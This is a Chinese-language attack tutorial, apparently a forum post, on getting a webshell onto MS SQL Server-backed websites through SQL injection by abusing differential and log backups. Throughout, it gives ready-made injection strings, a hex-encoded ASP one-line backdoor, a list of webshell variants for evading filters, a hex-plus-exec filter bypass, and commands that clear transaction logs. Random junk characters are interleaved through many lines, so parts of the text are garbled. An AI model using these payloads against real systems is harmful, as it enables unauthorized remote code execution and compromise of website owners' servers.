MSsql差异备份总结

admin

差异备份的流程大概这样：
1.完整备份一次(保存位置当然可以改)
3 e$ g# s+ I2 x' [" Z, F2 T' Ibackup database 库名 to disk = 'c:\ddd.bak';--
- q5 J4 m1 x2 F7 m0 z
2.创建表并插曲入数据
# _6 z2 z* U% _! z8 p- qcreate table [dbo].[dtest] ([cmd] [image]);
, y3 o% i; O- j0 K$ j( I) ninsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
" i. z$ m" A7 D" r' }% e" |
3.进行差异备份
" L9 A, X! @* g+ Ybackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
$ i8 d/ J% P6 b! {: K6 n
上面
5 ]; E& q" m) F0x3C25657865637574652872657175657374282261222929253E
& s! ]1 ?- |' U2 C就是一句话木马的内容：<%execute(request("a"))%>
% x9 A& n: K& y9 C3 O) n/ |4 Z7 f
如下是网上常见的差异备份代码，思路一样！
===================================================
% J, Q2 T9 x  _' S利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:

  i) L. i- H% o7 e" l; r/ odeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库
! @# c8 t  ~7 \. k
create table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表

8 G* x7 Z- N/ g: `
, J  C% F* P) C0 d% ]insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份

drop table [xiaolu]  -- 删除此表。

0x77006F006B0061006F002E00620061006B00为wokao.bak
& i2 W# L4 }' y* L. G2 n0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
6 L) T: v! L; ~) F0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
. u  A8 g4 I$ M0 d6 z4 T1 b
声明：方法不是我想的，我只是写工具，默认得到shell是
) E  Z1 {3 b9 T5 E6 I5 K<%execute(request("a"))%>
5 e7 Z( O1 A( A: |===============================================================
4 }, X( `& j2 }% {
我发现上面代码，有时会无效，而直接用
+ ~4 l$ U* Y9 c
backup database 库名 to disk = 'c:\ddd.bak'
( i7 K- ^2 }4 I: `# }& E. I, T0 ^
create table [dbo].[dtest] ([cmd] [image]);

insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
2 V" `. ~( Q; Q0 e  B, I7 e
  u1 k% i# X* i  e% B) [* M/ T5 mbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！
, D  ~/ \0 L6 @: s0 Z. w; ~
) M$ |; J  ]  o4 L$ m  x- H9 Q- c库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！

网上还有log增量备份的，我也把他记录一下
% _( i9 P% W8 |6 L  G3 T  G=====================================================
& O6 _' ~( H% p8 }( G另一种log增量备份技术:
4 K7 v/ H8 U' F0 ?
';alter database null set RECOVERY FULL--

) C$ I1 m' U: i9 r1 Q2 `* J2 J';create table cmd (a image)--

& D0 w7 f( r, f0 `- B5 f';backup log null to disk = 'f:\cmd' with init--
' ~  _4 b! W" `# w) c! d) _/ H
. W7 F% T2 n8 L' L5 D';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
4 I6 R& E1 j2 {8 j
3 @' _4 y; o$ m8 \';backup log null to disk = '备份路径'--

';drop table cmd--
6 E" w- h( p& r6 G- ^, [
';alter database XXX set RECOVERY SIMPLE--

PS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句话小马16进制转来的
% R( U( r# _3 X: @6 u1 }
* W1 ]5 C  a3 ]说到一句话马，还可以有这么几种写法：
* s1 q* k' i6 O+ m- \* J; L' n
' o- a1 p" {$ e: ma)<%%25Execute(request("a"))%%25>
2 T# J  ^5 G  ~% Q7 S( ]2 E( \b)<%Execute(request("a"))%>
0 r: t, N# `0 ~( ?9 Fc)%><%execute request("a")%><%
d)<script language=VBScript runat=server>execute request("a")</script>
e)<%25Execute(request("a"))%25>
f)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
h)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
: i/ ^5 V% A$ @  y/ w( lI)<%eval request(0)%>
/ J6 o0 r: s% W& x2 RJ)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话
: e6 q7 j$ J/ g% q
& i1 \3 L* z- n& a( c. E! K7 |=============================================
8 t4 ~& |4 b8 a; p; C
当遇到差备过滤了/时用这个语句代替

& U9 z& d; D: K. h& a* cdeclare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--
/ ^' `; f- t, j/ H! m7 T0 W
/ v$ k( B) \+ q  R% O! q' }把要执行的语句转16进制然后用exec执行
" e3 n0 ^9 A. t, ^2 W
5 _3 Y$ d/ U* r; k) B7 \( H
' G4 H9 k8 g2 D; |- J* y: L减少备份文件大小方法如下:

总的来说就是那么简单几句,下面以备份数据库model为例子
4 i7 Z2 F) m% B- m0 q' t1
, Y3 v2 s' Y& X( M! E" xid=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
! m" U& L7 b* q" [" F& s9 L2
id=1;backup database model to disk='你的路径‘ with differential,format;--
7 a# M( K6 `9 o' t+ s0 B  n3 a4 s
, |3 M6 u% C1 K+ W& O! V: x
, h/ A+ o) S1 y! Q* O
SQL语句清理日志
1 ?) d1 n. ]. z7 y& o3 ^注：test为数据库名
5 j/ J- a+ q4 _/ N: M3 }! D% P
9 ~- ~$ q3 j  i: \9 U7 i# t1 ?4 g--清空日志
- p" Y& @+ p, t2 IDUMP TRANSACTION test WITH NO_LOG

6 R& `. l: W$ v5 r--截断事务日志
6 A! S9 C# `! J& O# L( m( R9 fBACKUP LOG test WITH NO_LOG
$ K" A2 P# N4 C# k( c4 s3 `
--收缩数据库
& R/ u# ?! c+ [, @* \7 FDBCC SHRINKDATABASE(test)
8 l* k4 o5 l0 X: w
$ _- F7 T- I$ s: ?--收缩指定数据文件,1是文件号,可以通过这个语句查询到
0 y+ n$ K; V+ l6 ^Select * from sysfiles DBCC SHRINKFILE(1)
* T( I5 M; _: p& ?6 k7 J
--以后能自动收缩
EXEC sp_dboption 'test', 'autoshrink', 'TRUE'